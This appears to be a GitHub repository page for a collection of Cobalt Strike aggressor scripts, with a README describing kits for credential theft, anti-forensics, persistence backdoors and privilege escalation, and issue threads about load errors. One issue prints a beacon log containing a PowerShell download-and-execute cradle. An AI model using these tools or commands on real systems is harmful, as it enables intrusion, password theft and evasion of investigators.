
aggressor-scripts's Introduction

Aggressor Scripts

This is just a random collection of Aggressor Scripts I've written for Cobalt Strike 3.x.

Please note that most of them could probably use some tweaking to better suit your environment/tactics.

Shoot me any questions and feel free to submit a pull request for any improvements you may have!

Using this repository

I make use of git submodules, so clone this repo with git clone --recursive

If you didn't follow my instructions and already cloned the repo, go to the root of the repo and run git submodule update --init --recursive

Kits

Most of the useful scripts here are organized in kits. All you have to do is load the KitLoader.cna script, and it will automatically load all other kits (except the DebugKit).

Kit descriptions

  1. AnnoyKit

Actions in this kit center around miscellaneous fun that generally involves messing with the user.

  2. AntiForensicsKit

Actions in this kit center around antiforensics. If it slows an investigator down, it likely belongs in this kit. We all know antiforensics is best forensics.

  3. CredKit

Actions in this kit center around credential theft, be it via memory scraping or reading files in. If it involves stealing passwords, it should be here.

  4. DebugKit

This kit is limited to actions that I use for development and debugging, and thus is not loaded with the rest of them.

  5. EnumKit

Actions in this kit center around host and network enumeration. Credential enumeration actions should go in CredKit instead.

  6. PersistKit

Actions in this kit center around endpoint persistence. Examples include backdoor service creation, backdoor process creation, etc.

  7. PrivEscKit

Actions in this kit center around endpoint privilege escalation. Actions that involve forceful scanning (powerup.ps1, unix-privesc-check) should go in the appropriate section.

  8. ThirdParty

This is just a random collection of .cna scripts that other people have created that I like to use. I just have it loaded with kitloader for convenience. There may be changes to the third party scripts to better integrate with my workflow.

Other scripts

inveigh/

Runs Inveigh against the selected machine(s) for a specified amount of time. This does automatically enable LLMNR and NBNS spoofing.

Ebowla/

Adds interoperability between Cobalt Strike and Ebowla. I plan on making this process much more integrated and automated, but at this time, you can generate an Ebowla payload within Cobalt Strike by going to Attacks -> Generate Ebowla Payload. See ebowla-interop.cna for instructions.

Pushover/

Pushover support for Cobalt Strike, ridiculously useful.

See pushover-cs for instructions.

Reports/

These are reporting (.rpt) scripts created for Cobalt Strike.

aggressor-scripts's People

Contributors

mandreko, redsec-shay, und3rf10w, zacharyhenson


aggressor-scripts's Issues

Load error

When I attempt to load this script into Cobalt Strike via the Script Manager I receive the following error "Could not load...... Error: Syntax error at line 29 beacon_command-register"

Fix the "Browse..." button in ebowla-interop.cna

The "Browse..." button in ebowla-interop.cna currently does not function. However, if a valid path is entered in the text box, everything will function as normal.

Whatever fix is done for this should simply replace the value in $textFieldPayloadInput using

[$textFieldPayloadInput setText: "/path/to/input/payload"];

Get-ChromePasswords.ps1 fails (maybe size?)

I was troubleshooting the ChromePasswords script, and getting an interesting error in CobaltStrike:

beacon> powershell-import Get-ChromePasswords.ps1
beacon> powerpick Get-ChromePasswords
[*] Tasked beacon to run: IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:43763/'))
[+] host called home, send: 135753 bytes
[+] received output:
ERROR: downloadstring : Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the
ERROR: remote server"
ERROR:
ERROR: At line:1 char:121
ERROR: + IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:28023/'); IEX ((new-object net.we
ERROR: bclient).downloadstring <<<< ('http://127.0.0.1:43763/'))
ERROR:    + CategoryInfo        : NotSpecified: (:) [], MethodInvocationException
ERROR:    + FullyQualifiedErrorId : DotNetMethodException
ERROR:

I initially figured something was just wrong with the script and moved on. Later, I analyzed the script, and found that there were two "F"s in the word "FFunction". After fixing that, I did:

beacon> powershell-import
[-] max powershell import size is 1MB. Compressed script is: 2538520 bytes

It could just be how I'm running it, but it hasn't succeeded in any fashion I've tried. I haven't yet resolved it though. Maybe you want to test it and see if it works for you? Maybe something has changed.

ntfsADSBackdoor.cna will not load

When I attempt to load this into Cobalt Strike via the Scripting Manager I receive the following error "unknown expression at line 21 : txt and unknown expression at line 21: adfjklbalgjbr"

Reorganize beacon menus for proper SSH support

Currently, all SSH commands are incorrectly added in this repository.

For example, see the credKit:

popup beacon_bottom {
    menu "CredKit" {
        menu "Windows" {
            # < ... snip ... >
        }
        menu "Linux" {
            # < ... snip ... >
        }
    }
}

In the current state, if an operator were to right-click on an SSH beacon, they would not see any of the commands within the kit. This is because ssh and beacon are different popup hooks. The proper format is as follows:

popup beacon_bottom {
    menu "CredKit" {
        # all Windows commands go here
    }
}

popup ssh {
    menu "CredKit" {
        # all SSH commands go here
    }
}

This modification needs to be performed for all kits. This also eliminates the need to separate the SSH and Windows commands within the menu.

postExploit: convert Chrome and Firefox password scripts

The scripts Get-ChromePasswords.ps1 and Get-FirefoxPasswords.ps1 are too large to be imported through bpowershell_import().

Convert them to be hosted using the bhost_script() subroutine and execute that way.

Tasks

  • add bhost_script() to postExploit.cna (currently in privesc branch)
  • Convert Get-ChromePasswords.ps1 to use bhost_script()
  • Convert Get-FirefoxPasswords.ps1 to use bhost_script()
